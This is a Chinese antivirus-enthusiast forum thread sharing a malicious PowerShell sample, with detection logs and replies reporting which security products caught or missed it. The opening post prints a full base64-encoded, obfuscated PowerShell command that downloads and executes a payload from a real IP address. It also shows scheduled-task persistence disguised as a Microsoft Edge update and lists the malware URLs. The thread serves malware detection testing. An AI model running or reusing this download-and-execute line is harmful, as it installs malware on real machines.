收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 恶意PS1
123下一页
返回列表 发新帖
查看: 2657|回复: 20
收起左侧

[病毒样本] 恶意PS1

[复制链接]
761773275
发表于 2023-4-9 16:06:59 | 显示全部楼层 |阅读模式
本帖最后由 761773275 于 2023-4-9 16:20 编辑

BEST 无文件攻击检测
  1. HyperDetect 机器学习检测到恶意命令行执行。

  3. 进程 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 被阻止, 由于执行了恶意命令行"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4ANgA5AC8AZABsAGwALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
复制代码
BEST 沙箱检测到恶意行为
  1. “C:\Windows\SysWOW64\rundll32.exe” /S C:\Users\admin\AppData\Roaming\NoSleep.dll 被添加到系统注册表中,名称为:Task Scheduler\MicrosoftEdgeUpdateTaskMachineCore{1575CC8A-457A-1700-652A-6AF2B031A266}
  2. “C:\Windows\SysWOW64\rundll32.exe” /S C:\Users\admin\AppData\Roaming\NoSleep.dll 被添加到系统注册表中,名称为:Task Scheduler\MicrosoftEdgeUpdateTaskMachineCore{1575CC8A-457A-1700-652A-6BF2B031A266}
  3. 示例尝试连接到以下恶意 URL:
  4. hxxp://62.204.41.69/dll.png
  5. hxxp://62.204.41.69/ldn.dll
  6. hxxp://62.204.41.69
复制代码
SOPHOS 检测到惡意 PowerShell 活動
  1. 在 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 检测到 Exec_6a (T1059.001)
复制代码







本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

dght432
发表于 2023-4-9 16:16:51 | 显示全部楼层
本帖最后由 dght432 于 2023-4-9 16:36 编辑

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

luoying2334
发表于 2023-4-9 16:20:19 | 显示全部楼层
火绒扫描MISS
回复

举报

chx818
发表于 2023-4-9 16:48:28 | 显示全部楼层
essp扫描杀

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

117054487
发表于 2023-4-9 17:12:23 | 显示全部楼层
本帖最后由 117054487 于 2023-4-9 17:13 编辑

事件: 检测到恶意对象
应用程序: Windows PowerShell
用户: DESKTOP-200DKGT\fengye
用户类型: 活动用户
组件: 系统监控
结果说明: 检测到
类型: 木马
名称: HEUR:Trojan.PowerShell.EvilPower.gen
威胁级别: 高
对象类型: 文件
对象路径: pscmd:\9d1b01a5d50111af5b35d319e0cac00e14fbf08a1c4f391c423b379e0b27c98b//
对象名称: amsi_script_utf8
原因: 数据库
数据库发布日期: 今天,2023/4/9 12:56:00

事件: 检测到恶意对象
应用程序: Windows PowerShell
用户: DESKTOP-200DKGT\fengye
用户类型: 活动用户
组件: 系统监控
结果说明: 检测到
类型: 木马
名称: PDM:Trojan.Win32.Generic.nblk
威胁级别: 高
对象类型: 进程
对象路径: c:\users\fengye\desktop
对象名称: 000000000.ps1
原因: 行为分析
数据库发布日期: 今天,2023/4/9 12:56:00

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

Shake2333
发表于 2023-4-9 17:25:15 | 显示全部楼层
mcafee扫描双击均miss
回复

举报

UNknownOoo
发表于 2023-4-9 17:49:22 | 显示全部楼层
火绒
双击
有效数签(

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

petr0vic
发表于 2023-4-9 19:26:18 | 显示全部楼层
it`s same
https://bbs.kafan.cn/thread-2254474-1-1.html
回复

举报

wwwab
发表于 2023-4-9 19:33:15 | 显示全部楼层
petr0vic 发表于 2023-4-9 19:26
it`s same
https://bbs.kafan.cn/thread-2254474-1-1.html

Hello, It is same family but not same sample. And I found more samples, the release test will continue later.

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

胡淇允
发表于 2023-4-9 19:46:19 | 显示全部楼层
avast scan miss
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-2 08:35 , Processed in 0.171208 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表